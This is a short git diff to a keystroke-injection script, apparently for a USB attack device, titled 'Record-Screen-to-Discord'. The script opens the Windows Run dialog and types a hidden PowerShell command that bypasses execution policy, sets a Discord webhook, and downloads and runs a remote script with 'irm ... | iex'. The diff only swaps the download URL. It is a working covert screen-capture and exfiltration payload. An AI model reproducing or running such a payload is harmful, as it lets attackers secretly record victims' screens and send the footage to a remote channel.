diff --git a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt index 3f11045..9b8c634 100644 --- a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt +++ b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwscreendc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm https://bw0.cc/dcscr | iex ENTER